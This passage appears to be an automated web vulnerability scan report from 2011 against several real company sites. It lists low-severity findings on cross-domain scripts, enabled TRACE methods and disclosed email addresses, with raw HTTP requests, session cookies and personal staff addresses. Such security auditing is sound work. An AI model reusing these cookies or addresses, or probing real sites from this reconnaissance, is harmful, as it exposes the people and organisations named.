Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</div>
               <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

16.9. http://www.palantirtech.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.palantirtech.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about HTTP/1.1
Host: www.palantirtech.com
Proxy-Connection: keep-alive
Referer: http://www.palantirtech.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:333-ZTX-377&token:_mch-palantirtech.com-1297709434972-66622; __utmz=1.1297709435.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1932573632.1297709435.1297709435.1297709435.1; __utmc=1; __utmb=1.1.10.1297709435

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:51:42 GMT
Server: thttpd/2.25b
X-Powered-By: PHP/5.1.6
X-Pingback: /_ptwp_live_ect0/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</div>
               <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

16.10. http://www.securitynewsdaily.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securitynewsdaily.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:13 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=hlmo9hnbt56jevkmj0vf1uonb4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 14 Feb 2011 18:57:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<div id="right-google-col">
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="//edge.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...
</div><script type='text/javascript' id='popup_tag_script' src='http://api.toptenreviews.com/r/c/request.php?path=tmn/security&sub_id=testsubid'></script>
...[SNIP]...

16.11. http://www.securitynewsdaily.com/tools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securitynewsdaily.com
Path:   /tools/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tools/ HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878; __utmz=27158498.1297709852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27158498.1497794322.1297709852.1297709852.1297709852.1; __utmc=27158498; __utmb=27158498.1.10.1297709852; reaction_28=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:26 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 14 Feb 2011 18:57:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<div id="adsense_article_bottom">
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
<div id="right-google-col">
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="//edge.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...
</div><script type='text/javascript' id='popup_tag_script' src='http://api.toptenreviews.com/r/c/request.php?path=tmn/security&sub_id=testsubid'></script>
...[SNIP]...

17. TRACE method is enabled  previous  next
There are 2 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


17.1. http://hidglobal.122.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hidglobal.122.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: hidglobal.122.2o7.net
Cookie: d20ef23018a298a7

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:03 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: hidglobal.122.2o7.net
Cookie: d20ef23018a298a7
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


17.2. http://metrics.hidglobal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.hidglobal.com
Path:   /

Request

TRACE / HTTP/1.0
Host: metrics.hidglobal.com
Cookie: 7df5125ac7c2d806

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:44 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.hidglobal.com
Cookie: 7df5125ac7c2d806
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


18. Email addresses disclosed  previous  next
There are 16 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


18.1. https://www-secure.symantec.com/connect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /connect/

Issue detail

The following email address was disclosed in the response:

Request

GET /connect/ HTTP/1.1
Host: www-secure.symantec.com
Connection: keep-alive
Referer: https://symaccount.symantec.com/SymAccount/index.jsp?returnURL=https%3A%2F%2Fwww-secure.symantec.com%2Fconnect%2Fsymantec_symaccount
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; s_pers=%20s_nr%3D1297710257466-New%7C1318446257466%3B%20event69%3Devent69%7C1318446257467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520allconnct%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fuser%2525252Fregister%252526ot%25253DA%3B; s_cc=true; s_sq=symantecmysymantec%2Cveritasnonconsumer%3D%2526pid%253Dbiz%25253A%252520symaccount%25253A%252520member%252520login%2526pidt%253D1%2526oid%253Djavascript%25253Adocument.profile.submit%252528%252529%25253B%2526ot%253DA; SESSfb1d8525d94d660bc8f92b8419fd5ae1=0a7468d0124fbe8fc54c8398bc4f1e8d; lifb1d8525d94d660bc8f92b8419fd5ae1=T

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:04:35 +0000
ETag: "1297710275"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 14 Feb 2011 19:04:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 14 Feb 2011 19:04:35 GMT
Connection: keep-alive
Content-Length: 93773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<a href="/connect/user/truongvannayyahoocom">truongvannay@yahoo.com</a>
...[SNIP]...

18.2. https://www-secure.symantec.com/connect/sites/default/files/js/js_6e1ccd61cdbfbfb2c218c237cef494b0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /connect/sites/default/files/js/js_6e1ccd61cdbfbfb2c218c237cef494b0.js

Issue detail

The following email address was disclosed in the response:

Request

GET /connect/sites/default/files/js/js_6e1ccd61cdbfbfb2c218c237cef494b0.js HTTP/1.1
Host: www-secure.symantec.com
Connection: keep-alive
Referer: https://www-secure.symantec.com/connect/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; s_pers=%20s_nr%3D1297710257466-New%7C1318446257466%3B%20event69%3Devent69%7C1318446257467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520allconnct%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fuser%2525252Fregister%252526ot%25253DA%3B; s_cc=true; s_sq=symantecmysymantec%2Cveritasnonconsumer%3D%2526pid%253Dbiz%25253A%252520symaccount%25253A%252520member%252520login%2526pidt%253D1%2526oid%253Djavascript%25253Adocument.profile.submit%252528%252529%25253B%2526ot%253DA; SESSfb1d8525d94d660bc8f92b8419fd5ae1=0a7468d0124fbe8fc54c8398bc4f1e8d; lifb1d8525d94d660bc8f92b8419fd5ae1=T

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 11 Feb 2011 02:56:28 GMT
ETag: "295004a-28a05-49bf8d82f0f00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 19:04:35 GMT
Connection: keep-alive
Content-Length: 166405

// $Id: jquery.js,v 1.12.2.3 2008/06/25 09:38:39 goba Exp $

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
...[SNIP]...
<jesus.carrera@trafficbroker.co.uk>
...[SNIP]...

18.3. http://www.bericotechnologies.com/berico-projects/coral-reef  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bericotechnologies.com
Path:   /berico-projects/coral-reef

Issue detail

The following email address was disclosed in the response:

Request

GET /berico-projects/coral-reef HTTP/1.1
Host: www.bericotechnologies.com
Proxy-Connection: keep-alive
Referer: http://www.bericotechnologies.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS3c4036a5947dcf60c7c1c31f914be361=9f5cadef4aa0a266b0ff7d08a7f3814d; has_js=1; __utmz=177377846.1297709462.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=177377846.1924676899.1297709462.1297709462.1297709462.1; __utmc=177377846; __utmb=177377846.1.10.1297709462

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 14 Feb 2011 18:52:52 GMT
Server: Apache
Content-Length: 683
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...
<p>Please contact the server administrator,
webmaster@bericotechnologies.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

18.4. http://www.bericotechnologies.com/sites/default/files/scripts/jquery.innerfade.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bericotechnologies.com
Path:   /sites/default/files/scripts/jquery.innerfade.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/default/files/scripts/jquery.innerfade.js HTTP/1.1
Host: www.bericotechnologies.com
Proxy-Connection: keep-alive
Referer: http://www.bericotechnologies.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS3c4036a5947dcf60c7c1c31f914be361=9f5cadef4aa0a266b0ff7d08a7f3814d

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:50:44 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 16:49:42 GMT
Accept-Ranges: bytes
Content-Length: 15776
Cache-Control: max-age=1209600
Expires: Mon, 28 Feb 2011 18:50:44 GMT
Content-Type: application/javascript

/* =========================================================

// jquery.innerfade.js

// Datum: 2008-02-14
// Firma: Medienfreunde Hofmann & Baldes GbR
// Author: Torsten Baldes
// Mail: t.baldes@medienfreunde.com
// Web: http://medienfreunde.com

// based on the work of Matt Oakes http://portfolio.gizone.co.uk/applications/slideshow/
// and Ralf S. Engelschall http://trainofthoughts.org/

*
* <ul id=
...[SNIP]...

18.5. http://www.bericotechnologies.com/sites/default/files/scripts/swfobject/swfIN.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bericotechnologies.com
Path:   /sites/default/files/scripts/swfobject/swfIN.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/default/files/scripts/swfobject/swfIN.js?L HTTP/1.1
Host: www.bericotechnologies.com
Proxy-Connection: keep-alive
Referer: http://www.bericotechnologies.com/berico-projects/coral-reef
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS3c4036a5947dcf60c7c1c31f914be361=9f5cadef4aa0a266b0ff7d08a7f3814d; __utmz=177377846.1297709462.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=177377846.1924676899.1297709462.1297709462.1297709462.1; __utmc=177377846; __utmb=177377846.1.10.1297709462; has_js=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:52:53 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 16:49:42 GMT
Accept-Ranges: bytes
Content-Length: 12088
Cache-Control: max-age=1209600
Expires: Mon, 28 Feb 2011 18:52:53 GMT
Content-Type: application/javascript

.../*////////////////////////////////////////////////////////////////////////////////////////

swfIN 2.3.1 - 2009-02-05
javascript toolkit for flash developers
.. 2005-2009 Francis Turmel | swfIN.nectere.ca | www.nectere.ca | francis@nectere.ca
released under the MIT license

/*////////////////////////////////////////////////////////////////////////////////////////
if(typeof swfIN=="undefined"){var swfIN=function(b,c,d,a){this.params=[];th
...[SNIP]...

18.6. http://www.businesswire.com/js/calendar/lang/calendar-en.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /js/calendar/lang/calendar-en.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/calendar/lang/calendar-en.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.businesswire.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:44:50 GMT
Server: Apache
Last-Modified: Thu, 01 May 2008 23:54:52 GMT
ETag: "38bc6-1170-44c33fdcdab00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 4464

// ** I18N

// Calendar EN language
// Author: Mihai Bazon, <mihai_bazon@yahoo.com>
// Encoding: any
// Distributed under the same terms as the calendar itself.

// For translators: please use UTF-8 i
...[SNIP]...

18.7. http://www.businesswire.com/js/calendar/src/calendar.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /js/calendar/src/calendar.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/calendar/src/calendar.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.businesswire.com

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:44:48 GMT
Server: Apache
Last-Modified: Mon, 05 Oct 2009 18:41:14 GMT
ETag: "38be2-1b260-4753475538680"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 111200

/*
* The Zapatec DHTML Calendar
*
* Copyright (c) 2004 by Zapatec, Inc.
* http://www.zapatec.com
* 1700 MLK Way, Berkeley, California,
* 94709, U.S.A.
* All rights reserved.
*
* Main Calendar
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

18.8. http://www.hidglobal.com/javascript/jquery.pngFix.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /javascript/jquery.pngFix.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /javascript/jquery.pngFix.js HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/page.php?page_id=223
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D; PHPSESSID=kr9b485jm7dv1f9g8un99oala4

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:38 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 08 Dec 2010 23:11:36 GMT
ETag: "be40a8-123b-496ee3e277a00"
Accept-Ranges: bytes
Content-Length: 4667
Connection: close
Content-Type: application/x-javascript

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.2, 09.03.2009
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Changelog:
* 09
...[SNIP]...
d @ from selectors
* 11.09.2007 Version 1.1
* - removed noConflict
* - added png-support for input type=image
* - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup.com
* 31.05.2007 initial Version 1.0
* --------------------------------------------------------------------
* @example $(function(){$(document).pngFix();});
* @desc Fi
...[SNIP]...

18.9. http://www.hidglobal.com/javascript/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /javascript/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascript/s_code.js HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Referer: http://www.hidglobal.com/page.php?page_id=223
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.1.10.1297708154; s_sq=%5B%5BB%5D%5D; PHPSESSID=kr9b485jm7dv1f9g8un99oala4

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:40 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 08 Dec 2010 23:11:36 GMT
ETag: "be40bf-7971-496ee3e277a00"
Accept-Ranges: bytes
Content-Length: 31089
Connection: close
Content-Type: application/x-javascript

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
P
...[SNIP]...
';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.
...[SNIP]...

18.10. http://www.hidglobal.com/lightbox_page.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /lightbox_page.php

Issue detail

The following email address was disclosed in the response:

Request

GET /lightbox_page.php?page_id=295&height=425&width=500&random=1297709294065 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
Cache-Control: no-cache
Host: www.hidglobal.com
Cookie: PHPSESSID=oqdoeilmq8hpvmm2juqttqi523
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:47:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2375
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv='Content-T
...[SNIP]...
<a href="mailto:rvanryt@hidglobal.com" target="_blank" onclick="var s=s_gi(s_account); s.linkTrackVars='prop19,events'; s.linkTrackEvents='event12'; s.prop19='contact rene'; s.events='event12'; s.tl(this,'o','IDS Contact page');">rvanryt@hidglobal.com</a>
...[SNIP]...

18.11. http://www.hidglobal.com/lightbox_page.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /lightbox_page.php

Issue detail

The following email address was disclosed in the response:

Request

GET /lightbox_page.php?page_id=297&height=500&width=500&random=1297709234191 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
Cache-Control: no-cache
Host: www.hidglobal.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:51:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=s464kq0dm1keovd7dnl3q5kgq6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2663
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv='Content-T
...[SNIP]...
<a href="mailto:atangun@hidglobal.com" target="_blank" onclick="var s=s_gi(s_account); s.linkTrackVars='prop19,events'; s.linkTrackEvents='event12'; s.prop19='contact adam'; s.events='event12'; s.tl(this,'o','IDS Contact page');">atangun@hidglobal.com</a>
...[SNIP]...

18.12. http://www.hidglobal.com/lightbox_page.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /lightbox_page.php

Issue detail

The following email address was disclosed in the response:

Request

